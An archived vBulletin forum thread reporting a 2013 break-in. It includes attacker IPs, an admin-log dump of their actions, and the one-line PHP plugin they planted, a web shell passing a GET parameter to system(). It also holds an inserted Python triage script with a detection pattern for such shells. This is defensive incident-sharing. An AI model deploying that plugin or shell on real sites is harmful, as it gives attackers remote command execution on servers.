The Archive of Official vBulletin Modifications Site. It is not a VB3 engine, just a parsed copy!
#1
v4.2.0 hacker details
This script kiddy can't handle his hormones and has gone on a rampage.
https://www.google.co.uk/#q=%22ma3kesi%22

Most of the forums are running 4.2.0 (some patch 3). Several hundred (including mine) are showing that username indexed in Google in the past week. IP addresses found in my adminlog table (you can search them yourself), from Indonesia/Burma:

203.81.72.83
101.255.62.233

Email (I think not real; they didn't need a real email once inside): ma3kesi@mm.com

Block these IPs, they are frequently used for all types of attacks (even on Gmail and Facebook).

What they did. From the adminlog (descending, so the first actions are at the bottom). Column headers: `adminlogid`, `userid`, `dateline`, `script`, `action`, `extrainfo`, `ipaddress`

Code:
(7627, 1920, 1379801626, 'user.php', 'modify', '', '203.81.72.83'),
(7626, 1920, 1379801594, 'user.php', 'find', '', '203.81.72.83'),
(7625, 1920, 1379801583, 'user.php', 'find', '', '203.81.72.83'),
(7624, 1920, 1379801578, 'user.php', 'modify', '', '203.81.72.83'),
(7623, 1920, 1379801565, 'user.php', 'add', '', '203.81.72.83'),
(7622, 1920, 1379801447, 'plugin.php', '', '', '203.81.72.83'),
(7621, 1920, 1379801445, 'plugin.php', 'kill', 'plugin id = 40', '203.81.72.83'),
(7620, 1920, 1379801443, 'plugin.php', 'delete', 'plugin id = 40', '203.81.72.83'),
(7619, 1920, 1379801438, 'plugin.php', '', '', '203.81.72.83'),
(7618, 1920, 1379801436, 'plugin.php', 'kill', 'plugin id = 42', '203.81.72.83'),
(7617, 1920, 1379801434, 'plugin.php', 'delete', 'plugin id = 42', '203.81.72.83'),
(7616, 1920, 1379801428, 'plugin.php', '', '', '203.81.72.83'),
(7615, 1920, 1379801426, 'plugin.php', 'kill', 'plugin id = 41', '203.81.72.83'),
(7614, 1920, 1379801424, 'plugin.php', 'delete', 'plugin id = 41', '203.81.72.83'),
(7613, 1920, 1379801410, 'plugin.php', 'modify', '', '203.81.72.83'),
(7612, 1920, 1379801373, 'options.php', 'options', '', '203.81.72.83'),
(7611, 1920, 1379801371, 'options.php', 'dooptions', '', '203.81.72.83'),
(7610, 1920, 1379801359, 'options.php', 'options', '', '203.81.72.83'),
(7609, 1920, 1379801279, 'options.php', 'options', '', '203.81.72.83'),
(7608, 1920, 1379801226, 'options.php', 'options', '', '203.81.72.83'),
(7607, 1920, 1379801224, 'options.php', 'dooptions', '', '203.81.72.83'),
(7606, 1920, 1379801181, 'options.php', 'options', '', '203.81.72.83'),
(7605, 1920, 1379801180, 'options.php', 'dooptions', '', '203.81.72.83'),
(7604, 1920, 1379801144, 'options.php', 'options', '', '203.81.72.83'),
(7603, 1920, 1379801125, 'options.php', '', '', '203.81.72.83'),
(7602, 1920, 1379801038, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7601, 1920, 1379801023, 'user.php', 'modify', '', '203.81.72.83'),
(7600, 1920, 1379801021, 'user.php', 'kill', 'user id = 1919', '203.81.72.83'),
(7599, 1920, 1379801016, 'user.php', 'remove', 'user id = 1919', '203.81.72.83'),
(7598, 1920, 1379801011, 'user.php', 'edit', 'user id = 1919', '203.81.72.83'),
(7597, 1920, 1379801005, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7596, 1920, 1379800998, 'user.php', 'modify', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7594, 1920, 1379800993, 'user.php', 'remove', 'user id = 1', '203.81.72.83'),
(7593, 1920, 1379800978, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7592, 1920, 1379800969, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7591, 1920, 1379800891, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7590, 1920, 1379800870, 'user.php', 'find', '', '203.81.72.83'),
(7589, 1920, 1379800860, 'user.php', 'modify', 'user id = 1', '203.81.72.83'),
(7588, 1920, 1379800858, 'user.php', 'update', 'user id = 1', '203.81.72.83'),
(7587, 1920, 1379800838, 'user.php', 'edit', 'user id = 1', '203.81.72.83'),
(7586, 1920, 1379800807, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7585, 1920, 1379800798, 'user.php', 'prune', '', '203.81.72.83'),
(7584, 1920, 1379800796, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7583, 1920, 1379800786, 'user.php', 'prune', '', '203.81.72.83'),
(7582, 1920, 1379800784, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7581, 1920, 1379800783, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7580, 1920, 1379800781, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7579, 1920, 1379800779, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7578, 1920, 1379800777, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7577, 1920, 1379800775, 'user.php', 'dodeleteusers', '', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7575, 1920, 1379800628, 'user.php', 'pruneusers', '', '203.81.72.83'),
(7574, 1920, 1379800602, 'user.php', 'prune', '', '203.81.72.83'),
(7573, 1920, 1379800585, 'banning.php', 'dobanuser', 'username = mikey', '203.81.72.83'),
(7572, 1920, 1379800556, 'banning.php', 'banuser', '', '203.81.72.83'),
(7571, 1920, 1379800485, 'plugin.php', 'updateactive', '', '203.81.72.83'),
(7570, 1920, 1379800467, 'plugin.php', '', '', '203.81.72.83'),
(7569, 1920, 1379800465, 'plugin.php', 'kill', 'plugin id = 18', '203.81.72.83'),
(7568, 1920, 1379800462, 'plugin.php', 'delete', 'plugin id = 18', '203.81.72.83'),
(7567, 1920, 1379800445, 'plugin.php', '', '', '203.81.72.83'),
(7566, 1920, 1379800443, 'plugin.php', 'kill', 'plugin id = 17', '203.81.72.83'),
(7565, 1920, 1379800441, 'plugin.php', 'delete', 'plugin id = 17', '203.81.72.83'),
(7564, 1920, 1379800421, 'plugin.php', '', '', '203.81.72.83'),
(7563, 1920, 1379800420, 'plugin.php', 'kill', 'plugin id = 51', '203.81.72.83'),
(7562, 1920, 1379800416, 'plugin.php', 'delete', 'plugin id = 51', '203.81.72.83'),
(7561, 1920, 1379800412, 'plugin.php', 'modify', '', '203.81.72.83'),
(7560, 1920, 1379800376, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7559, 1920, 1379800371, 'navigation.php', 'update', 'navid = 0, tabid = 2', '203.81.72.83'),
(7558, 1920, 1379800363, 'navigation.php', 'list', 'navid = 0, tabid = 2', '203.81.72.83'),
(7557, 1920, 1379800361, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7556, 1920, 1379800359, 'navigation.php', 'default', 'navid = 2, tabid = 0', '203.81.72.83'),
(7555, 1920, 1379800351, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7554, 1920, 1379800349, 'navigation.php', 'update', 'navid = 0, tabid = 1', '203.81.72.83'),
(7553, 1920, 1379800343, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7552, 1920, 1379800341, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7551, 1920, 1379800338, 'navigation.php', 'default', 'navid = 75, tabid = 0', '203.81.72.83'),
(7550, 1920, 1379800283, 'navigation.php', 'list', 'navid = 0, tabid = 1', '203.81.72.83'),
(7549, 1920, 1379800281, 'navigation.php', 'dodefault', 'navid = 0, tabid = 0', '203.81.72.83'),
(7548, 1920, 1379800278, 'navigation.php', 'default', 'navid = 1, tabid = 0', '203.81.72.83'),
(7547, 1920, 1379800273, 'navigation.php', 'list', 'navid = 0, tabid = 0', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7545, 1920, 1379800170, 'template.php', 'edit', 'style id = 0', '203.81.72.83'),
(7544, 1920, 1379800166, 'template.php', 'modify', '', '203.81.72.83'),
(7543, 1920, 1379800156, 'template.php', 'modify', '', '203.81.72.83'),
(7542, 1920, 1379800151, 'template.php', 'modify', '', '203.81.72.83'),
(7541, 1920, 1379800099, 'plugin.php', '', '', '203.81.72.83'),
(7540, 1920, 1379800091, 'plugin.php', 'update', '', '203.81.72.83'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7531, 1919, 1379796618, 'plugin.php', 'updateactive', '', '101.255.62.233'),
(7530, 1919, 1379796615, 'plugin.php', '', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233');

They inserted this plugin (it was id=52 for me):

Code:
(52, 'lol', 'ajax_complete', 'if(isset($_GET[''lol''])){echo\r\n"<h1>lol</h1><pre>"; system($_GET\r\n[''lol'']);exit;}', 'vbulletin', '', 1, 5);

Initially they did change the main forum.php file too; I think this was through the admincp option because there is no sign of FTP access. I'm not a server guy, maybe they got in through SSH. I also have about 550 lines of raw server log data, showing what these 2 IPs did. I'm not sure if I should post it or not though. It seems to start with admincp/zxc.php
2 thanks from: Max Taxable, smirkley
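An added triage script, not from the thread or from vBulletin: it parses adminlog rows in the SQL dump shape quoted in the post above and flags admincp activity from IPs outside an allowlist, actions by user ids that are not known admins, and the plugin/template/user actions that install code or destroy data, plus a check for plugin PHP that pipes request input into an execution sink (the shape of the 'lol' plugin). The sample rows, the trusted IP 192.0.2.10 and userid 1 as the legitimate admin are constructed assumptions.

```python
import re

# Constructed sample shaped like the adminlog rows quoted in the post:
# (adminlogid, userid, dateline, script, action, extrainfo, ipaddress)
SAMPLE_DUMP = """
(7528, 1919, 1379796603, 'plugin.php', 'files', '', '101.255.62.233'),
(7529, 1919, 1379796615, 'plugin.php', 'doimport', '', '101.255.62.233'),
(7539, 1920, 1379800067, 'plugin.php', 'add', '', '203.81.72.83'),
(7546, 1920, 1379800181, 'template.php', 'updatetemplate', 'style id = 3', '203.81.72.83'),
(7576, 1920, 1379800773, 'user.php', 'dopruneusers', '', '203.81.72.83'),
(7595, 1920, 1379800996, 'user.php', 'kill', 'user id = 1', '203.81.72.83'),
(7700, 1, 1379900000, 'options.php', 'options', '', '192.0.2.10');
"""
FIELDS = ("adminlogid", "userid", "dateline", "script", "action", "extrainfo", "ipaddress")
ROW_RE = re.compile(r"\((\d+),\s*(\d+),\s*(\d+),\s*'([^']*)',\s*'([^']*)',\s*'([^']*)',\s*'([^']*)'\)")
# Admin actions that install code, edit templates, or create/destroy accounts.
HIGH_RISK = {
    ("plugin.php", "add"), ("plugin.php", "doimport"), ("plugin.php", "updateactive"),
    ("plugin.php", "kill"), ("template.php", "updatetemplate"), ("user.php", "add"),
    ("user.php", "kill"), ("user.php", "dopruneusers"), ("user.php", "dodeleteusers"),
}
# A PHP execution sink fed straight from request input, the shape of the 'lol' plugin.
SHELL_RE = re.compile(
    r"\b(system|exec|shell_exec|passthru|popen|proc_open|eval)\s*\(\s*\$_(GET|POST|REQUEST|COOKIE)\b")

def parse_adminlog(dump):
    """Parse a SQL VALUES dump of the adminlog table into dicts, oldest first."""
    rows = [dict(zip(FIELDS, m.groups())) for m in ROW_RE.finditer(dump)]
    for r in rows:
        for k in ("adminlogid", "userid", "dateline"):
            r[k] = int(r[k])
    return sorted(rows, key=lambda r: r["dateline"])

def triage(dump, trusted_ips, known_admins):
    """Return (adminlogid, reason) alerts for rows the forum owner should examine."""
    alerts = []
    for r in parse_adminlog(dump):
        if r["ipaddress"] not in trusted_ips:
            alerts.append((r["adminlogid"], "admincp use from untrusted IP " + r["ipaddress"]))
        if r["userid"] not in known_admins:
            alerts.append((r["adminlogid"], "action by unknown admin userid %d" % r["userid"]))
        if (r["script"], r["action"]) in HIGH_RISK:
            alerts.append((r["adminlogid"], "high-risk %s/%s %s" % (r["script"], r["action"], r["extrainfo"])))
    return alerts

def suspicious_plugin_code(phpcode):
    """True when plugin PHP passes request input straight to a command/code execution sink."""
    return SHELL_RE.search(phpcode) is not None
```

`triage(SAMPLE_DUMP, {"192.0.2.10"}, {1})` flags every attacker row in the sample and nothing from the legitimate admin; the real check is the same call over your own adminlog export with your IPs and admin user ids, and `suspicious_plugin_code` over each row of the plugin table.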
#2
Anyway, just to post the IPs by themselves?
#3
IP blocking is a near useless tool anymore, since IPs and even user agent strings are so easy to spoof. Great and informative post though, otherwise.
#4
That's why I have mostly left my admincp locked with .htaccess and allowed only my own IP. At least I have been safe for the last 8 months; I only got hacked once last year, and that I recovered from.